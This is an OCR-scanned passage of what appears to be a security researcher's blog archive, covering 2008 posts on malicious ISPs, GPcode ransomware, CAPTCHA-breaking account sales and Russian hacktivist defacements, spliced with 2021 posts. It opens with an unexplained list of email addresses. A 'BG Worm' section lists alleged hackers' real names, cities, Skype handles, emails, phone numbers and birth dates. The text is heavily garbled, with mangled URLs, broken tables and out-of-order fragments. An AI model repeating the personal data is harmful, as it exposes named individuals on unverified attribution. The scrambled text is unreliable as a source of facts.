kocak@gmail.com 
Lagimales@gmail.com 
Achmadbuana702@gmail.com 
DagezGans@Gmail.com 
otnay222@gmail.com 
qwsfdqw@gmail.com 
Lubbock@gmail.com 
mrlite444@gmail.com 
goblokkO07@gmail.com 
asassaf@mail.com 
pentest@gmail.com 
afsdfsf@sdgs.com 
Jokowi@gmail.com 
gwbenerindahkalomiminnyamau@haha.co 
Notwork@gmail.com 
sdmmeruyung1928@gmail.com 
admin@makrumskincare.com 
info@reliancetouch.com 
mhmmddeniaja@gmail.com 
udinwafi@gmail.com 
dekopi324@gmail.com 
fake@gmail.com 
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The top ten network (AS) blocks hosting badware websites were: 


Number of 
Network block name & description Country infected sites 
CHINANET-BACKBONE No.31LJin-rong Street = China 48,834 
CHINA169-BACKBONE CNCGROUP Chinal69 China 17,713 


Backbone 

CHINANET-SH-AP China Telecom (Group) China 9,445 
CNCNET-CN China Netcom Corp. China 6,058 
GOOGLE - Google Inc. U.S. 4,261 
DXTNET Beijing Dian-Xin-Tong Network China 3,604 
Technologies Co., Ltd. 

SOFTLAYER - SoftLayer Technologies Inc. U.S. 3,507 
THEPLANET-AS - ThePlanet.com Internet U.S. 3,166 
Services, Inc. 

INETWORK-AS IEUROP AS France 2,878 
CHINANET-IDC-BJ-AP IDC, China China 207 


Telecommunications C orporation 


The [1]recently released badware report entitled “[2]May 2008 Badware Websites Report" lists 
several Chinese netblocks tolerating malicious sites on their networks. As always, these are 
just the tip of the iceberg out of a relatively good sample that the folks at Stopbadware.org 
used for the purposes of their report. In the long term however, with the increasing prelevance 
of fast-fluxing, a country’s malicious rating could become a variable based on the degree of 
dynamic fast-fluxing abusing its infrastructure in a particular moment in time. Moreover, for- 
warding the risk and the malicious infrastructure to malware infected hosts, and exploited web 
servers, creates a "twisted reality" where the countries with the most disperse infrastructure 
act as a front end to the countries abusing it, ones that make it in any report, since they are 
the abusers. 


The report lists the following malicious netblocks, a great update to a previous post on 
"[3]Geolocating Malicious ISPs" : 


- CHINANET-BACKBONE No.31,Jin-rong Street 
- CHINA169-BACKBONE CNCGROUP China169 
- CHINANET-SH-AP China Telecom (Group) 


- CNCNET-CN China Netcom Corp. 
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- GOOGLE - Google Inc. 

- DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd. 
- SOFTLAYER - SoftLayer Technologies Inc. 

- THEPLANET-AS - ThePlanet.com Internet Services, Inc. 

- INETWORK-AS IEUROP AS 


- CHINANET-IDC-BJ-AP IDC, China 


With some minor exceptions though, in the face of the following ISPs you rarely see in 
any report - InterCage, Inc., Softlayer Technologies, Layered Technologies, Inc., Ukrtelegroup 
Ltd, Turkey Abdallah Internet Hizmetleri, and Hostfresh. Ignoring for a second the fact that 
the "the whole is greater than the sum of it’s parts", in this case, the parts represent RBN’s 
split network. Since it’s becoming increasingly common for any of these ISPs to provide 
standard abuse replies and make it look like there’s a shutdown in process, the average 
time it takes to shut down a malware command and control, or a malicious domain used in 
a high-profile web malware attack is enough for the campaign to achieve its objective. The 
evasive tactics applied by the malicious parties in order to make it harder to assess and prove 
there’s anything malicious going on, unless of course you have access to multiple sources of 
information in cases when OSINT isn’t enough, are getting even more sophisticated these days. 
For instance, the Russian Business Network has always been taking advantage of "[4]fake 
account suspended notices" on the front indexes of its domains, whereas the live exploit URLs 
and the malware command and controls remained active. 


And while misconfigured web malware exploitation kits and malicious doorways continue 
supplying good samples of malicious activity, we will inevitable start witnessing more evasive 
practices applied in the very short term. 


Related posts: 

[5]The New Media Malware Gang - Part Three 
[6]The New Media Malware Gang - Part Two 
[7]The New Media Malware Gang 

[8]HACKED BY THE RBN! 


[9]Rogue RBN Software Pushed Through Blackhat SEO 
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[10]RBN’s Phishing Activities 

[11]RBN’s Puppets Need Their Master 

[12]RBN’s Fake Account Suspended Notices 

[13]A Diverse Portfolio of Fake Security Software 

[14]Go to Sleep, Go to Sleep my Little RBN 

[15]Exposing the Russian Business Network 
[16]Detecting the Blocking the Russian Business Network 
[17]Over 100 Malwares Hosted on a Single RBN IP 
[18]RBN’s Fake Security Software 


[19]The Russian Business Network 


. http://www. stopbadware.org/pdfs/StopBadware_Infected_Sites_Report_062408. pdf 


. http: //ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 
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. http: //ddanchev. blogspot .com/2008/02/new-media-malware-gang-part-three.htm 
. http: //ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 


media-malware-gang.htm 
. http: //ddanchev. blogspot .com/2008/04/hacked-by-rbn.htm 
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. http: //ddanchev. blogspot .com/2008/03/rogue-rbn- software-pushed- through. htm 


10. 

11. 
12. 
13. 


. http: //ddanchev.blogspot .com/2007/11/go-to-sleep- go-to-sleep-my-little-rbn.htm 


15. http: //ddanchev.blogspot.com/2007/11/exposing-russian-business-network.htm 


. http: //ddanchev.blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


17. http: //ddanchev.blogspot.com/2007/10/over-100-malwares—hosted-on-single-rbn. html 
18. http://ddanchev.blogspot .com/2007/10/rbns-fake-security-software.htm 
19. http: //ddanchev.blogspot .com/2007/10/russian-business-network.htm 
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4.7 July 


4.7.1 Summarizing June’s Threatscape (2008-07-01 12:21) 


Oancho Danchev's Blog - Mind Streams of 
information Security Knowledge 


June’s threatscape that I’ll summarize in this post based on all the research conducted during 
the month, was a very vibrant one. With the return of GPcode, a remotely exploitable flaw in 
the Zeus crimeware kit allowing both, researchers and malicious parties to assess the 
severity of a particular banker malware campaign, the increasing use of malicious doorways 
next to ICANN and IANA’s DNS hijacking, all speak for themselves and how diverse the 
threats and, of course, the abilities to maintain a decent situatiational awareness about 
what’s going on have become. 


01. [1]U.K’s Crime Reduction Portal Hosting Phishing Pages - nothing new here since 
vulnerable sites are to be "remotely file included" and SQL injected to locally host anything on 
behalf of a malicious party. Risk and responsibility forwarding is one thing, but having a crime 
reduction portal hosting phishing pages is entirely another. The phishing pages was shut 
down in less than 12 hours upon notification 


02. [2]Price Discrimination in the Market for Stolen Credit Cards - Tracking down "yet another 
stolen credit cards for sale" service in the wild, the price discremination that they applied 
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greatly reflects the current lack of transpararency for a potential buyer of stolen credit cards, 
and how higher profit margins are driving the entire business model. With script kiddies 
running their own botnets and undermining the sophisticated botnet master’s high profit 
margin business model by undercutting their prices, stolen credit cards are not what they 
used to be - an exclussive good. Nowadays, they are a commodity good and often a bargain 


03. [3]Blackhat SEO Redirects to Malware and Rogue Software - Sampling an active blackhat 
SEO campaign out of the hundreds of thousands currently active online, releaved a large 
portfolio of domains serving Zlob variants by pitching them as fake codecs that the end user 
should download if they are to view the non existent adult content at the sites. Where’s the 
OSINT mean? It’s in the fact that the codecs and the fake security software phone back to 
UkrTeleGroup Ltd’s network 


04. [4]Using Market Forces to Disrupt Botnets - With the current oversupply of malware 
infected hosts, and botnet masters embracing the services model for anything malicious, in 
this post | discussed the radical security approach of puchasing already infected malware 
hosts on a per country basis, disinfecting them and forcing them to update all the software on 
the infected PCs. Of course, on an opt-in basis. The possibility to directly provide incentives 
for botnet hunters to shut down whatever they come across to on a daily basis, and that’s a 
lot of botnets, is also there 
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05. [5]Who’s Behind the GPcode Ransomware? - The title speaks for itself, the research with 
enough actionable intelligence gathered in the shortest timeframe possible is already proving 
accurate and highly valuable. How come? Stay tuned for more developments 


06. [6]lmageShack Typosquatted to Serve Malware - In a rare instance of a creative attack 
combining typosquatting in order to impersonate ImageShack and serve malware by 
redirecting users to an image file that is actually forwarding to the binary, | was recently 
tipped by the folks at TrendMicro who are also following this that the site is up and running 
again. Not for long 


07. [7]Fake YouTube Site Serving Flash Exploits - Next to using the usual set of exploits 
courtesy of a commodity web malware exploitation kit, this campaign was also using flash 
exploits. Even more interesting is the fact that the password stealer obtained was attempting 
to phone back to a misconfigured malware command and control interface, basically allowing 
you to assess the campaign from the eyes of the "campaigner" 
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08. [8]Monetizing Web Site Defacements - Web site defacements are getting monetized just 
like SQL injections are in order to locally host a blackhat search engine optimization 
Campaign on a vulnerable site with a high page rank. In this post I’ve assessed such 
monetization courtesy of a web site defacer at The Africa Middle Market Fund 


09. [9]Malicious Doorways Redirecting to Malware - Yet another large domains portfolio 
exposed though a malicious doorway redirecting to fake porn and video sites serving Zlob 
variants, tracking down the initial spamming of the malicious doorways across multiple 
vulnerable forums and guestbooks 


10. [10]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw - When cyber 
criminals get advised to patch their vulnerable versons of the Zeus Crimeware Kit, you know 
there’s a monoculture in the crimeware market. This flaw released publicly in May, 2008, not 
just allows others to hijack someone’s ebanking botnet, but also, vendors and researchers to 
better assess a vulnerable Zeus command and control location 
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11. [11]Fake Celebrity Video Sites Serving Malware - When templates for fake video and adult 
sites are just as available as they are now, anyone can take advantage of this cheap social 
engineering track that seems to work just fine. Compared to relying on blackhat search 
optimization to acquire traffic, some of the campaigns were SQL injected at vulnerable sites 
in order to drive traffic to them, next to several other tactics which when combined can result 
in a lot of people unknowingly visiting the sites 


12. [12]Phishing Campaign Spreading Across Facebook - An internal phishing campaign was 
circulating across Facebook, which got taken care of thanks to coordinated efforts with 
Facebook’s security folks. There’s also an indicating tha they are currently typosquatting 
other social networking sites like Hi5 for instance 


13. [13]Underground Multitasking in Action - As a firm believed in taking a random sample for 
a particular threat segment, this was once of these cases confirming the confidence I’ve built 
into anticipating upcoming tactics and strategies to be used 
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14. [14]An Update to Photobucket’s DNS Hijacking - Despite that Photobucket didn’t oficially 
acknowledge the DNS hijacking, the hosting provider the NetDevilz hacking team used issued 
a statement. Ironically, the Turkish hacking group used the same provider weeks later to 
redirect ICANN and IANA’s domains to Atspace.com 


15. [15]Fake Porn Sites Serving Malware - Among the largest domains portfolio of malware 
serving porn sites I’ve exposed in a while, all of them naturally remain active since they are 
hosted on a partition of RBN’s diverse network. Visualizing a malicious doorway or the entire 
ecosystem provides a better understanding at how structured the ecosystems are 


16. [16]Backdoording Cyber Jihadist Ebooks for Surveillance Purposes - Despite that in 
this case we have a cyber jihadist backdoording his own released books, the international 
intelligence community next to law enforcement are known to have expressed interest in 
backdooring suspect’s PCs, so why not SQL inject the cyber jihadist forums themselves? 


17. [17]Right Wing Israeli Hackers Deface Hamas’s Site - When you read that Hamas’s 
site is hacked, you ask yourself the following, do they even have a web site that’s up the 
running? The answer to which would be the fact that even Hezbollah has been maintaining an 
Internet infrastructure since 1998 


18. [18]ICANN and IANA’s Domain Names Hijacked by the NetDevilz Hacking Group - A 
fact is a fact, no comment here, go through all the technical details of the hijacking, including 
some actionable intelligence on who’s behind the hijacking 


19. [19]The Malicious ISPs You Rarely See in Any Report - Who’s tolerating malicious ac- 
tivities on their network, and how is the RBN related to all this? Well, when combined, the tiny 
parts of these ISPs represent a tiny part of the Russian Business Network itself 


| 
. http: //ddanchev. blogspot .com/2008/06/price-discrimination-in-market-for.htm 


10. 
11. http: //ddanchev.blogspot .com/2008/06/fake-celebrity-video-sites-serving. htm 
12. 
13 
14 
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. http: //ddanchev. blogspot .com/2008/06/imageshack-typosquatted-to-serve.htm 


1 
2 
3 
4 
5 
6 
7 
8 
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15. http://ddanchev. blogspot .com/2008/06/fake-porn-sites-serving-malware.htm 


. http://ddanchev. blogspot .com/2008/06/backdoording-cyber- jihadist-ebooks-for.htm 
. http://ddanchev. blogspot .com/2008/06/right-wing-israeli-hackers-deface.htm 


. http://ddanchev. blogspot .com/2008/06/icann-and- ianas-domain-names-hijacked.htm 


. http://ddanchev. blogspot .com/2008/06/malicious-isps-you-rarely-see-in-any.htm 


4.7.2  Decrypting and Restoring GPcode Encrypted Files (2008-07-01 15:11) 
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The futile attempt to directly attack the encryption algorithm used by the GPcode ransomware, 
is prompting Kaspersky Labs to invest in a more [1]pragmatic solutions to the problem, with 
[2]a new version of the StopGpcode tool released last week. More info : 


"It turns out that if a user has files that are encrypted by Gpcode and versions of those 
same files that are unencrypted, then the pairs of files (the encrypted and corresponding 
unencrypted file) can be used to restore other files on the victim machine. This is the method 
that the StopGpcode2 tool uses. 


Where can these unencrypted files be found? They may be the result of using PhotoRec. 
Moreover, these files may be found in a backup storage or on removable media (e.g., the 
original files of photographs copied to the hard disk of a computer that has been attacked 
by Gpcode may still be on a camera’s memory card). Unencrypted files may also have been 
saved somewhere on a network resource (e.g., films or video clips on a public server) that the 
Gpcode virus has not reached." 
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As [3]the customer support desk behind GPcode pointed out in an interview, the mal- 
ware is prone to evolve, and the simplistic file deletion process will be replaced by secure 
file deletion in order to render all data recovery tols useless, unless of course backups of the 
affected data are available. They often aren’t, and depending on the importance of the files 
encrypted, the successful ransom is all a matter of the momentum. 


"A person, presumably the author of Gpcode, contacted at [4Jone of the e-mail addresses left 
behind by the program stated that future development efforts will likely increase the key size 
to 4,096 bits, "if AV companies or other (people) crack the current key, but (that’s) impos- 
sible. The self-proclaimed author, who used the name "Daniel Robertson," also said that 
other standard techniques to defeat antivirus will be added, including polymorphic encryption, 
anti-heuristic features and the ability to self propagate, turning the program into a computer 
virus. 


It well pays back itself," he said" 


There are even more pragmatic approaches to dealing with this problem, next to back- 
ups undermining their business model. [5]Try following the virtual money for instance. 


1. 

2. http://www.viruslist.com/en/viruses/encyclopedia?virusid=313444#doc2 

3. 

‘ 
5 


4.7.3 Chinese Bloggers Bypassing Censorship by Blogging Backward 
(2008-07-02 23:09) 
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MEXFHASASHLA GAA MME BOT 
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With China trying to silence over 30,000 rioters during the weekend, by deleting forum 
postings and deactivating accounts mentioning the riot, [1]Chinese bloggers have started 
using a widget they originally came up in order to [2]bypass the "Great Firewall of China" by 
blogging backward, vertically and horizontally : 


"So bloggers on forums such as Tianya.cn have taken to posting in formats that China’s 
Internet censors, often employees of commercial Internet service providers, have a hard time 
automatically detecting. One recent strategy involves online software that flips sentences 
to read right to left instead of left to right, and vertically instead of horizontally. China’s 
sophisticated censorship regime - known as the Great Firewall - can automatically track 
objectionable phrases. But "the country also has the most experienced and talented group of 
netizens who always know ways around it," said an editor at Tianya, owned by Hainan Tianya 
Online Networking Technology Co., who has been responsible for deleting posts about the riot" 


An old-school content obfuscation service that they could take advantage of, offers the 
opportunity to turn a short message into spam or a fake PGP encrypted file, where both parties 
can easily decode them to the original. 
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[3]Spammmic is what | have in mind. 


1. http: //online.wsj.com/article/SB121493163092919829.htm 
2. http: //www.cshbl.com/gushu. htm 
3. http: //www.spammimic.com/ 


4.7.4 Gmail, Yahoo and Hotmail’s CAPTCHA Broken (2008-07-03 14:52) 


Ceiiuac B Hannunn 


Cnyx«6a Kon-so axxos Lena 3a 1K axxos 

Mail.ru 4103 Oo 10K: $10 | or 10K go 100K: $8 | or 100K: $6 

Pochta.ru (+ FTP) 35 Ao 10K: $8 | or 10K no 100K: $5 | of 100K: $4 

Yandex.ru (+ Narod.ru) 0 Ao 10K: $9 | of 10K no 100K: $7 | or 100K: $5 

Gmail.com 147477 ao 10K: $6 | oT 10K no 100K: $5 | of 100K: $4 

Hotmail.com 42893 Ao 10K: $7 | or 10K no 100K: $6 | or 100K: $5 

Yahoo.com 10847 Ao 10K: $9 | of 10K no 100K: $7 | of 100K: $6 
kynute: 10K ¥|[Mailu_|¥)[ OK_ 


Pochta.ru 
Yandexru 
Gmail.com 
Hotmail.com 
Yahoo.com 


It’s one thing to start efficiently registering thousands of email accounts at reputable email 
providers by automatically breaking their CAPTCHA authentication, and entirely another 
to build a business model on the top of it next to the opportunity to abuse if for your own 
malicious purposes. Which is exactly what we have here, an underground service that’s selling 
registered accounts at Gmail, Yahoo, Hotmail and the most popular Russian email providers in 
the thousands. Once the inventory of registered accounts drops due to someone's purchase, 
it continues registering one to two email accounts per second. 


[1]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers : 


"Breaking Gmail, Yahoo and Hotmail’s CAPTCHAs, has been an urban legend for over two years 
now, with [2]do-it-yourself CAPTCHA breaking services, and proprietary underground tools 
assisting spammers, phishers and malware authors into registering hundreds of thousands of 
bogus accounts for spamming and fraudulent purposes. This post intends to make this official, 
by covering an underground service offering thousands of already registered Gmail, Yahoo 
and Hotmail accounts for sale, with new ones registered every second clearly indicating the 
success rate of their CAPTCHA breaking capabilities at these services." 
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Text based CAPTCHA is so broken, that if major web sites whose services are getting 
abused don’t at least try to slow down the efficient approach of breaking it, we are going 
to see an entire soamming infrastructure build on the foundation of legitimate email service 
providers. 


Related posts: 

[3]Vladuz’s Ebay CAPTCHA Populator 
[4]Spammers and Phishers Breaking CAPTCHAs 
[5]DIY CAPTCHA Breaking Service 


[6]Which CAPTCHA Do You Want to Decode Today? 


1, ft tip://blogs net. con/socurity/7p-1418 
2, ntvp://blogs .zanet.com/security/7p=1232 

3, hetp://adanchev blogspot. con/2007/09/viaduze-ebay-captcha-populator heal 

4, http://adanchey blogspot .con/2007 /09/spanners~and-phishers~ breaking~capt chas tall 
5, hetp://ddanchev blogspot .com/2007/10/dy-captcha- bresking-service.hénl 

6. http: //ddanchev. blogspot . com/2007/11/which-captcha-do-you-want-to-decode. html 


4.7.5 The Antivirus Industry in 2008 (2008-07-04 16:08) 
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/s31280/ci8. JPG 
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/s1280/ci7. JPG 
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/s1280/ci3. IPG 
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/s31280/ci2. JPG 
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/s1280/ci1. JPG 


17.6.7 Exposing the Ghostmarket.net Fraudulent and Rogue Cybercrime Friendly Fo- 
rum Community - An OSINT Analysis (2021-06-24 15:04) 


An image is worth a thousand words. 
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AV industry in 1998 


eee 
Image Copyright: IKARUS Security Software GmbH 


The folks at [1]lkarus Security Software seem to have enjoyed [2]drinking of the truth serum, 
to come up with such a realistic retrospective of the antivirus industry for the past 10 years, 
summarized in a single cartoon. Congrats, keeping it realistic means taking the issues seriously, 
compared to living in a self-serving twisted reality on their own. There’s no such thing as cat 
and mouse game anymore, since the mouse has gotten bigger than the cat. 


1. http: //www.ikarus-software.at/ 
2. http: //ddanchev. blogspot .com/2007/09/truth-serum-have-drink. htm 


4.7.6 Lithuania Attacked by Russian Hacktivists, 300 Sites Defaced (2008-07-07 08:19) 
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The world of information warfare 
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management Popa 
Data Network or email 
modification address spoofing 
Hoax Social 
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Last week’s [1]mass defacement of over 300 Lithuanian sites hosted on the same ISP, an 
upcoming attack that was largely anticipated due to the on purposely escalated online 
tensions out of Lithuan’s accepted legislation banning communist symbols across the counry, 
once again demonstrates information warfare building capabilities in action. 


Moreover, the attack is again relying on common prerequisites for a successful informa- 
tion warfare campaign, used in the [2]Russia vs Estonia cyberattack last year. These very 
same [3]Internet PSYOPS tactics ensure the success of the information warfare as a whole : 


- start publicly justifying upcoming attacks based on nationalism sentiments, which in a 
bandwidth empowered (botnets) collectivist society ensures a decent degree of cyber mobi- 
lization. In Lithuania’s case, the discussions across web forums were on purposely escalated 
to the point where "if you don’t take action, you’re not loyal to your country" 


- the media as the battleground for winning the hearts and minds of the bandwidth em- 
powered botnet masters, and position the insult against loyal nationalists next to the daily 
basis, thereby putting the nationalists in a "stand by" mode prompting them to take actions 
and to break even. In Estonia’s case for instance, news broadcasts of the riots on the streets 
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were on purposely broadcast as often as possible, mostly emphasizing on the nationalist 
sentiments within the crowds 


- prioritizing the attack targets, distributing the targets list and ensuring the coordina- 
tion in terms of the exact time and data for the attacks to take place is something that didn’t 
happen in the public domain for the mass defacement of Lithuanian sites, the way it happened 
in the Estonia attack 


- utilizing a [4]people’s information warfare tactic known as the malicious culture of par- 
ticipation, when everyone’s consciously contributing bandwidth to be used/abused by those 
coordinating the attacks 


Also, it’s important to point out that by the time they announced their ambitions to at- 
tack Lithuania and other countries such as Latvia, Ukraine, and again Estonian sites, they 
literally put these countries in a "stay tune" mode. [5]Here’s a translated statement : 


"All the hackers of the country have decided to unite, to counter the impudent actions 
of Western superpowers. We are fed up with NATO’s encroachment on our motherland, we 
have had enough of Ukrainian politicians who have forgotten their nation and only think about 
their own interests. And we are fed up with Estonian government institutions that blatantly 
re-write history and support fascism," says the appeal that is being circulated on Russian 
Internet forums." 


But why would they signal their intentions, compared to keeping them quiet and attack 
Lithuania surprisingly? Another relevant use of [6]PSYOPS, namely the biased exclusiveness 
and keeping a non-existent status bar for the upcoming attacks. And since they can launch 
a coordinated attack at the country at any time without warning about it, this warning was 
aiming to cause confusion prompting country officials to make public statements that could 
later on be analyzed and a better attack strategy formed on the basis of what they said 
they’ve done to ensure the attacks don’t succeed. 


If they did launch DDoS attacks compared to [7]defacing over 300 sites hosted on a sin- 
gle ISP, and had warned about the upcoming attacks about a week earlier, successfully 
shutting down the country’s Internet infrastructure would have achieved a double effect, since 
they did warn them about the attacks, and despite that they countries couldn’t prepate to 
fight back even though fighting back was futile right from the very beginning. 
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17.6.10 Exposing BG Worm - A Bulgaria-Based Web Site Defacement Group - An OS- 
INT Analysis (2021-06-25 08:20) 
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At least, that’s the level of confidence they’ve build into capabilities. 
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EvilHack -> http://www.youtube.com/user/AnonymousEvilHack/about -> http://cyber-code.tk/ 
-> BG Cyber Army -> http://www.zone-h.org/archive/notifier=Bulgarian %20Cyber %20Army 


-> https://www.facebook.com/bgcyberarmy 

Bca-group.org - Email: bca-group@mail.ru 

BG Cyber Army - Cyber Root, Cyber King, iNCUBUS, JoKeR, MoonSpire 

- [Pa3pyxA, FuckOFF, CyberKing, CyberLord] 

CyberLord: cyberlordbg@mail.ru :: [OK] 

[+] CyberKing: z3roc0O0I|@mail.ru :: [OK] 

Pa3pyxA: ra3pyxa@mail.ru 

Anonymous BG’s main forum URL: http://anonbg. info 

Group member handles: rootheR _, Hades, NoTolerance, EvilHack, PsychoPatternz. 


Forum postings for ID-ed member PsychoPatternz: http://anonbg.info/member.php?34- 
PsychoPatternz 


Forum postings for ID-ed member EvilHack: http://anonbg.info/member.php?13-EvilHack 
EvilHack’s real name: Genadi 

Skype: genadi 97 

Skype: anonymous _evilhack 

City: Veliko Turnovo or Tutrakan 

Associated emails: 

clangrf@abv.bg 

genadi _100@abv.bg 
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anonyops@abv.bg 

EvilHack@hmamail.com 
evilhackOO0@gmail.com 

evilhack@bk.ru 

evil hack@abv.bg 

URL he maintains: 
https://www.facebook.com/pages/EvilHack-Programs 
http://anonymous-world.free.bg/page-8.html 
http://web-dangerous.free.bg/page-9.html 
http://evilhack-official.blogspot.com/ 
http://www.podariavam.com/user/GenadiD 
PsychoPatternz’s name: Asparuh Naydenov 
City:: Plovdiv 

Skype: asparuh1231 

URLs he maintains: 
http://psychopatternz.blogspot.com/ 
https://www.facebook.com/hakhz/timeline 
Facebook profile: 
https://www.facebook.com/Psychopatternz 


EvilHack appears to be also a member of a newly emerged group, namely, Bulgarian Cyber 
Army. 


Connection: EvilHack -> _ http://www.youtube.com/user/AnonymousEvilHack/about -> 
http://cyber-code.tk/ -> BG Cyber Army -> http://www.zone-h.org/archive/notifier=Bulgarian 
%20Cyber %20Army 


-> https://www.facebook.com/bgcyberarmy 
Official Web site: bca-group.org - Email: bca-group@mail.ru 
Related group emails: bca-group@bk.ru; adrenalinovocs@abv.bg 
Current members: Cyber Root, Cyber King, iNCUBUS, JoKeR, MoonSpire 
Ex-members: Pa3pyxA, FuckOFF, CyberKing, CyberLord 
Group members’ associated emails: 
CyberLord - cyberlordbg@mail.ru 
CyberKing - z3roc0O0|I@mail.ru 
Pa3pyxA - ra3pyxa@mail.ru 
Group’s Name: Hack3D TeaM" or "MTH Soft 
Facebook: https://www.facebook.com/hack3dteam; 
https://www.facebook.com/bgworm. info 
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Vimeo account: http://vimeo.com/user16145338/videos 

Forum: http://hakerstvo.informe.com/ 

Zone-H Archive: http://zone-h.org/archive/notifier=MaStErChO/page=1 

Hackdb Archive: http://www.hack-db.com/hacker/r0Otkit/all.hAtm! 

Google Plus Profile: https://plus.google.com/1048785 737526245 22053/photos 
Group Members: rOOtkit, MaStErChO AloneWolf, Sspdf11, razora911, Metalgqear 
Shout outs most commonly given to - on the basis of multiple defaced 

page assessments -MaStErHaCk, - RTFM -The Godfather-(tm)(R) Pantelix (R)(tm) - 
(tm)W!PS(tm) - Tiger(tm) - Slackera - TraferA - 3ikmy - N3xOR. 

Known group domains’ reconnaissance: 

hxxp://bgworm.com - Email: gudolik@gmail.com - name: "Mastercho 

Hoomie" same as the Google Plus account 

hxxp://bgworm.info - historical WHOIS emails: Email: nikolas47@abv.bg; 

Email: mahon-74@hotmail.com 

Group member profile: Anton Nikolaev (MaStErChO) 

Email: ludoto 93@abv.bg - email used from the forum’s registration confirmation 
Secondary email: ludoto 93@hotmail.com - Reference: 


https://www.facebook.com/photo.php?fbid=32 7560933969442 &set=a.325721410820061.74800.12546€ 
885 &type=1 


Skype: ko.ti.puka 

Mobile: 0895373102 

Second Mobile: 0887565357 

Birth date: March 25, 1992 or 17 July, 1990 


Stay tuned! 
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17.6.11 A Cybercrime Ecosystem Themed Collages and Wallpapers (2021-06-25 08:21) 
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4.7.7 The ICANN Responds to the DNS Hijacking, Its Blog Under Attack 
(2008-07-07 13:27) 


# NeTDevilz # 


You think that you control the domains but you dart! Everybody knows wrang. We control the domsains indkuding ICA 


Dorlt you bebewe us? 


Last week, the ICANN has issued [1]an official statement regarding last month’s DNS hijackings 
of some of their domains : 


"The DNS redirect was a result of an attack on ICANN’s registrar’s systems. A 
full, confidential, security report from that registrar has since been provided to ICANN with 
respect to this attack. 


It would appear the attack was sophisticated, combining both social and techno- 
logical techniques, but was also limited and focused. The redirect was noticed and 
corrected within 20 minutes; however it may have taken anywhere up to 48 hours for the 
redirect to be entirely removed from the Internet. ICANN is confident that the lessons learned 
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detacting 
brochures. . 


numerous 
traffic 
anomalies 
at some of 
our 
mailsevers. 


www. stripgenerctor.com 


Stay tuned! 


1. https://1.bp.blogspot.com/-uQgi_e3Vq6k/YNPVmiacOnI /AAAAAAAANZQ/fuQdfbLwU00SxwOT j1BolKpt3uULCb1EwCLcBGAsYHQ 


s682/full.png 
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2. https: //1.bp. blogspot . com/-S8spOY3YsRQ/YNPV1yhKhKI/AAAAAAAANZE/WP4d06qC20MW£ jOGS7WYD52Lbc3q3Jd1QCLcBGAsYHQ 
3 
4. https: //1.bp. blogspot .com/—63hsb8H13gk/YNPVmE5UmEI /AAAAAAAANZM/sFpOOTD JwJYFyficWcntWTjkrluvOe0XwCLcBGAsYHQ 


17.7 July 


17.7.1 The Basics of Building an Early Warning System for Anticipating and Re- 
searching Cybercrime Trends - An Analysis (2021-07-05 08:46) 


17.7.2. My Memoir - Accepting Research Questions! (2021-07-05 11:47) 


[1] 
16296 


= 
a 
# 
= 
bal 
. 
7 
ne 
5 
od 
> 
2 
« 
o 
7 
4 
w 
Lal 
~ 
— 
” 
% 


Dear blog readers, 


| wanted to share with everyone the fact that I’ve started working on a high-profile personal 
memoir which basically encompasses a period of over 20 years in the field of computer and 
information security including the infamous Web 2.0 transition including my current career 
success and experienced in the world of security blogging cybercrime research and threat 
intelligence gathering up to present day. 


| also wanted to let you know that there will be a lot of bonus content including never-published 
before personal account type of research activity and the true story that took place throughout 
the 90’s in the world of hacking and computer security where | was a teenage hacker enthu- 


siast today’s leading expert in the field of security blogging cybercrime research and threat 
intelligence gathering. 


My request? I’m currently accepting research and interview questions from my blog readers 
which | could properly answer and present in the form of book chapters where necessary in 
terms of my experience as a teenage hacker enthusiast including my current position as a 
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leading expert in the field of cybercrime research and threat intelligence gathering. 


Here are some sample research questions which you could direct to me for the purpose of 


assisting me on my way to write and finish the memoir. 


1. https://1.bp.blogspot .com/-oYyzm_ebx_U/YOK93KDKHMI /AAAAAAAANmc/uQ9Ttb5EGssfE1S2VtzFrHAl1UUisxoIxgCLcBGAsYHQ 
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17.7.3. Thanks, But no Thanks! (2021-07-06 21:10) 


[1] 


® Identified Competitors 


Cyber Defense Agency (CDA) 
(US) 

Cyber Security Research and 
Development Center (US) 
Cyveillance (US) 

Dancho Danchev (EU) 
Department of Homeland 
Security US-CERT(US) 

Ernst & Young (EU) 

EWA Information and 
Infrastructure Technologies, Inc. 
(US) 

Fortify (US) 

Global Security Mag (EU) 


Dear blog readers, 


Competitors 


iDefense Labs (US) 

WET Intelligent Risk Systems (US) 
Informatica (US) 

IT — Information Sharing and 
Analysis Center (US) 

iSIGHT Partners (US) 
Lookingglass (US) 

Multi-State Information Sharing 
Analysis Center (US) 

nCircle (US) 

SecureWorks (US) 

Trend Micro (US) 

United States Cyber 
Consequence Unit (US) 


Following a series of successful data mining and OSINT enrichment successes in the face of 
OSINT and Law Enforcement operation called "Uncle George" including my recent attempt to 
take down approximately 3,000 ransomware emails which was quite a success including the 
recent and ongoing publication of various compilations of currently active high-profile cyber- 
criminal email addresses and XMPP/Jabber accounts | had the privilege to get several of my 
blog posts censored and basically taken offline courtesy of Google which is actually good news 


in the face of the basic news that I’m currently sitting have been and will continue to be sitting 
16298 


on a treasure trove of threat intelligence and cyber attack attribution information on current 
and emerging cyber threats including to get actual legal threats from various individuals who 
appear to have been busy closing down their Twitter and Facebook accounts including LinkedIn 
accounts meaning quite a success for the actual data mining and technical collection process 
where the ultimate goal here would be to assist U.S Law Enforcement and the U.S Intelligence 
Community on its way to track down and prosecute the cybercriminals. 


Who wants to rock the boat with me? Request an invite-only 
reader access today! Sharing Is caring. 


Are you a long-time reader of this blog? Are you basically fascinated by the richness and 
the informative content on current and emerging cyber threats? Do you want to get a pri- 
vate invite-only reader access to keep me motivated? Sharing is caring. Consider sending an 
introduction message to dancho.danchev@hush.com including your current position and moti- 
vation for reading this blog how has it helped you including a copy of your CV for the purpose 
of getting invite-only private access that would greatly motivate me to produce high-quality 
and never published content before in an invite-only fashion. 


[2] 
: : : BN = 
703,887 999,478 10,863.89 . 1,728,890 1 73 
ee ed Cees 
Dounce Rate 
73.29% 
[3] 
92 704,548 999,476 73.29% 
1, &® United States 30 é 287,037 408,860 73,80% 
2. MB Germany 7 ¢ 30,155 39,449 71.61% 
3. & United Kingdom 4 (4 42,415 58,011 72.62% 
